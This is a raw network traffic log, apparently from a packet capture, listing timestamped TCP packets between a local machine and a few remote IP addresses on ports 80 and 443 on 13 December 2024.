                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.834980011 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.835118055 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.835166931 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.835282087 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.835900068 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.835964918 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.835983992 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.836298943 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.836956978 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.837003946 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.837929010 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.837975025 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.838074923 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.838921070 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.838928938 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.839927912 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.839936972 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.840905905 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.840981960 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.841819048 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.841885090 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.842833042 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.842853069 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.842926979 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.842988014 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.843822002 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.843828917 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.844830990 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.844947100 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.845776081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.845860958 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.846725941 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.847027063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.847743034 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.847764015 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.848691940 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.848828077 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.849725962 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.849827051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.850750923 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.850811005 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.850836992 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.851547003 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.851627111 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.851686954 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.851799965 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.851835012 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.851922989 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.852735043 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.852797985 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.852897882 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.853634119 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.853732109 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.854716063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.854866028 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.855715990 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.855782032 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.856585979 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.856725931 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.856751919 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.856770992 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.857577085 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.857666016 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.858697891 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.858732939 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.859580040 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.859654903 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.860560894 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.860634089 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.860970020 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.861069918 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.861632109 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.861790895 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.862252951 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.862612009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.862649918 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.862962008 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.863539934 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.863545895 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.863590002 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.864609957 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.864706993 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.864790916 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.865466118 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.865591049 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.866456985 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.866645098 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.867475033 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.867578030 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.868509054 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.868557930 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.869426966 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.869432926 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.870383978 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.870474100 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.871054888 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.871387005 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.871433020 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.871464014 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.871491909 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.871648073 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.872365952 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.872442961 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.872482061 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.872529030 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.873369932 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.873440981 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.873441935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.873482943 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.874368906 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.874480009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.875303030 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.881125927 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.957334042 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.964118004 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.965884924 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.015880108 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.015944004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.016144037 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.016437054 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.017167091 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.017587900 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.017836094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.018584013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.018718004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.019506931 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.019619942 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.020482063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.020565033 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.021511078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.021559000 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.022454977 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.022480965 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.022578955 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.022842884 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.022842884 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.023462057 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.023545027 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.023561001 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.023633957 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.024446011 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.024544001 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.024580956 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.024604082 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.025388956 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.025499105 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.025554895 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.026438951 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.026570082 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.027384043 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.027538061 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.028419971 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.028464079 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.029372931 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.029568911 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.030396938 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.030452013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.031344891 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.031490088 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.032299042 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.032418013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.032531977 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.032824993 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.032824993 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.033297062 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.033418894 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.034266949 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.034427881 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.034461021 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.034548998 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.035274029 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.035378933 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.036233902 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.036339998 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.037260056 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.037358046 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.038249969 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.038360119 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.039205074 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.039411068 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.040169954 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.040227890 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.041189909 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.041301012 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.042180061 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.042280912 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.043162107 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.043282032 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.044166088 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.044255972 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.045208931 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.045464039 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.046250105 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.046469927 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.047213078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.047347069 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.048089027 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.048155069 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.049153090 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.049268007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.050174952 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.050405025 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.051107883 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.051248074 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.052053928 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.052220106 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.052725077 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.053030014 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.053143024 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.054018974 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.054155111 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.054997921 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.055130959 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.056025982 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.056112051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.057008028 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.057120085 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.057961941 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.058151007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.059051991 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.059171915 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.059499025 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.059587002 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.059587002 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.059607983 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.059659004 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.060013056 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.060076952 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.060904026 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.061023951 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.061896086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.061983109 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.062892914 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.062993050 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.063091993 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.063318014 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.063869953 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.064054012 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.064295053 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.064853907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.065001965 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.065133095 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.065198898 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.065838099 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.065953970 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.066874981 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.066956043 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.072942019 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.085752964 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.142771959 CET49860443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.142793894 CET44349860116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.145735979 CET49860443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.148178101 CET49860443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.148194075 CET44349860116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.208039045 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.208184004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.208473921 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.208616972 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.209481955 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.209613085 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.210524082 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.210618019 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.211507082 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.211591005 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.212413073 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.212563038 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.213463068 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.213527918 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.214227915 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.214394093 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.214456081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.215408087 CET8049840185.215.113.16192.168.2.4
